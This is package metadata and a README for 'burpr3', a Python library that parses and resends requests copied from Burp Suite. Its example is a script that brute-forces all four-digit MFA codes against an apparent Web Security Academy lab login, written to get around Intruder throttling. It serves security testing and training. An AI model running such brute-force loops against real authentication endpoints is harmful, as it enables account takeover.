Metadata-Version: 2.1
Name: burpr3
Version: 0.0.2
Summary: A Burp Suite request parser, used for aid in assessing application security functionality.
Home-page: https://github.com/krystianbajno/burpr
Author: Krystian Bajno
Author-email: krystian.bajno@gmail.com
License: MIT
Keywords: burp suite burpsuite request parser
Classifier: License :: OSI Approved :: MIT License
Classifier: Programming Language :: Python :: 3
Description-Content-Type: text/markdown
License-File: LICENSE.txt

# What is it
A Burp Suite request parser, used for aid in assessing application security functionality.

# Why I wrote it
To bypass the throttling 'Burp Suite Community' does to the intruder.

# Usage
Use burpr.py module to parse the Burp Suite copied request. Then use the created object to extract headers and body.

Supports parsing requests as strings and as .txt files.

```python
import burpr

# Load from string
req = burpr.parse_string(req_string)

# Load from file
req = burpr.parse_file(req_file_path)

# clone the request
req_clone = burpr.clone(req)

# change protocol to http1.1
req_clone.set_protocol(burpr.protocols.HTTP1_1)

# change transport to http
req_clone.set_transport(burpr.transports.HTTP)

# modify the header
req_clone.set_header("Cookie", "session=modified_session_cookie")

# modify the parameter
req_clone.set_parameter("post-param", "AAABBBCCC")

# remove parameter
req_clone.remove_parameter("post-param")

# remove header
req_clone.remove_header("Cookie")

# adjust Content-Length for parameter change
burpr.prepare(req_clone)

client = httpx.Client(http2=True)
res = client.post(req.url, headers=req.headers, data=req.body)
```

# Examples
## Brute force broken MFA
```python
import burpr
import httpx
import itertools

burp_request = r"""POST /login2 HTTP/2
Host: xxxx.web-security-academy.net
Cookie: verify=carlos; session=xxxx
Content-Length: 13
Cache-Control: max-age=0
Sec-Ch-Ua: 
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: ""
Upgrade-Insecure-Requests: 1
Origin: https://xxxx.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://xxxx.web-security-academy.net/login2
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

mfa-code=4321
"""

def generate_pin_numbers():
  return [''.join(list([str(digit) for digit in permutation])) 
          for permutation in itertools.product(list(range(0, 10)), repeat=4)]

def brute_force_broken_mfa():
  # Parse request from string
  req = burpr.parse_string(burp_request)

  # Create http client and check the protocol used
  client = httpx.Client(http2=req.is_http2)

  for pin in generate_pin_numbers():
    # Modify the mfa-code parameter
    req.set_parameter("mfa-code", pin)

    # Send the request
    res = client.post(req.url, headers=req.headers, data=req.body)

    print(res.status_code, pin)
    
    if (res.status_code != 200):
      break

brute_force_broken_mfa()
```
